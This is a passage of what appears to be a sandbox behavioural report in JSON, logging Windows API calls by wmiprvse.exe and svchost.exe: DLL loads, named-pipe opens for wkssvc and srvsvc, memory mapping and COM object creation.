                "name": "FileName",
                "value": "C:\\Windows\\System32\\logoncli.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 234
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003b4"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee0070000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00043000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 235
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\LOGONCLI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee0070000"
              }
            ],
            "repeated": 0,
            "id": 236
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\schedcli.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 237
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003bc"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed9490000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0000c000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 238
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\SCHEDCLI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffed9490000"
              }
            ],
            "repeated": 0,
            "id": 239
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wkscli.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 240
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003c0"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfcf0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00019000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 241
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\WKSCLI"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedfcf0000"
              }
            ],
            "repeated": 0,
            "id": 242
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003c0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\dsrole.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 243
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003c4"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedc560000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0000a000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 244
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\DSROLE"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedc560000"
              }
            ],
            "repeated": 0,
            "id": 245
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "wkscli.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfcf0000"
              }
            ],
            "repeated": 0,
            "id": 246
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003d0"
              },
              {
                "name": "DesiredAccess",
                "value": "0xc0100080",
                "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PIPE\\wkssvc"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "no"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 247
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003d0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\wkssvc"
              },
              {
                "name": "FileInformationClass",
                "value": "23",
                "pretty_value": "FilePipeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 248
          },
          {
            "timestamp": "2025-11-20 10:58:33,882",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003d0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\wkssvc"
              },
              {
                "name": "FileInformationClass",
                "value": "41",
                "pretty_value": "FileIoStatusBlockRangeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x02\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 249
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003d0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\wkssvc"
              },
              {
                "name": "FileInformationClass",
                "value": "30",
                "pretty_value": "FileCompletionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8\\xe9\\xa0+\\x1e\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 250
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\cscapi"
              },
              {
                "name": "DllBase",
                "value": "0x7ffece280000"
              }
            ],
            "repeated": 0,
            "id": 251
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "cscapi.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffece280000"
              }
            ],
            "repeated": 0,
            "id": 252
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e4"
              },
              {
                "name": "DesiredAccess",
                "value": "0xc0100080",
                "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PIPE\\srvsvc"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "no"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 253
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e4"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\srvsvc"
              },
              {
                "name": "FileInformationClass",
                "value": "23",
                "pretty_value": "FilePipeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 254
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e4"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\srvsvc"
              },
              {
                "name": "FileInformationClass",
                "value": "41",
                "pretty_value": "FileIoStatusBlockRangeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x02\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 255
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e4"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\srvsvc"
              },
              {
                "name": "FileInformationClass",
                "value": "30",
                "pretty_value": "FileCompletionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\xe6\\xa0+\\x1e\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 256
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e0"
              },
              {
                "name": "DesiredAccess",
                "value": "0xc0100080",
                "pretty_value": "GENERIC_READ|GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PIPE\\srvsvc"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "no"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 257
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\srvsvc"
              },
              {
                "name": "FileInformationClass",
                "value": "23",
                "pretty_value": "FilePipeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 258
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\srvsvc"
              },
              {
                "name": "FileInformationClass",
                "value": "41",
                "pretty_value": "FileIoStatusBlockRangeInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x02\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 259
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003e0"
              },
              {
                "name": "HandleName",
                "value": "\\Device\\NamedPipe\\srvsvc"
              },
              {
                "name": "FileInformationClass",
                "value": "30",
                "pretty_value": "FileCompletionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\xed\\xa0+\\x1e\\x02\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 260
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "KERNEL32.DLL"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1660000"
              }
            ],
            "repeated": 0,
            "id": 261
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000003a4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\ru-RU\\cimwin32.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 262
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000003d8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0c0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f6827b8f0"
              },
              {
                "name": "ViewSize",
                "value": "0x00003000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 263
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "OLEAUT32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a80000"
              }
            ],
            "repeated": 0,
            "id": 264
          },
          {
            "timestamp": "2025-11-20 10:58:33,897",
            "thread_id": "4248",
            "caller": "0x7ff79aaf4661",
            "parentcaller": "0x7ff79ab0158d",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2dc55000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 265
          },
          {
            "timestamp": "2025-11-20 10:59:37,116",
            "thread_id": "4240",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000003a0"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 266
          },
          {
            "timestamp": "2025-11-20 11:00:33,772",
            "thread_id": "4280",
            "caller": "0x7ff79aaf8469",
            "parentcaller": "0x7ff79aaf8591",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba3e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00026000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 267
          },
          {
            "timestamp": "2025-11-20 11:00:33,772",
            "thread_id": "4280",
            "caller": "0x7ff79aaf9cfa",
            "parentcaller": "0x7ff79aafae26",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba2e000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 268
          }
        ],
        "threads": [
          "3424",
          "1388",
          "1260",
          "4244",
          "4248",
          "4240",
          "4280"
        ],
        "environ": {
          "UserName": "HOME-PC$",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff79aaf0000",
          "MainExeSize": "0x0007e000",
          "Bitness": "64-bit"
        },
        "file_activities": {
          "read_files": [],
          "write_files": [],
          "delete_files": []
        }
      },
      {
        "process_id": 3212,
        "process_name": "svchost.exe",
        "parent_id": 600,
        "module_path": "C:\\Windows\\System32\\svchost.exe",
        "first_seen": "2025-11-20 10:58:31,678",
        "calls": [
          {
            "timestamp": "2025-11-20 10:58:33,725",
            "thread_id": "3508",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000338-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 0
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "3508",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffed967359f",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemcore.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffed40d0000"
              }
            ],
            "repeated": 0,
            "id": 1
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "3508",
            "caller": "0x7ffed96735f7",
            "parentcaller": "0x7ffee2f7b20e",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4FA18276-912A-11D1-AD9B-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000000-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 2
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "3508",
            "caller": "0x7ffec7f83a1a",
            "parentcaller": "0x7ffed40e8f9b",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 3
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "3508",
            "caller": "0x7ffed95f2c1e",
            "parentcaller": "0x7ffed40e9057",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "44ACA674-E8FC-11D0-A07C-00C04FB68820"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 4
          },
          {
            "timestamp": "2025-11-20 10:58:33,741",
            "thread_id": "3508",
            "caller": "0x7ffed3fea4f0",
            "parentcaller": "0x7ffed3fea195",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 5
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "348",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000339-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 6
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "348",
            "caller": "0x7ffec7f84e9b",
            "parentcaller": "0x7ffec7f86a2f",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
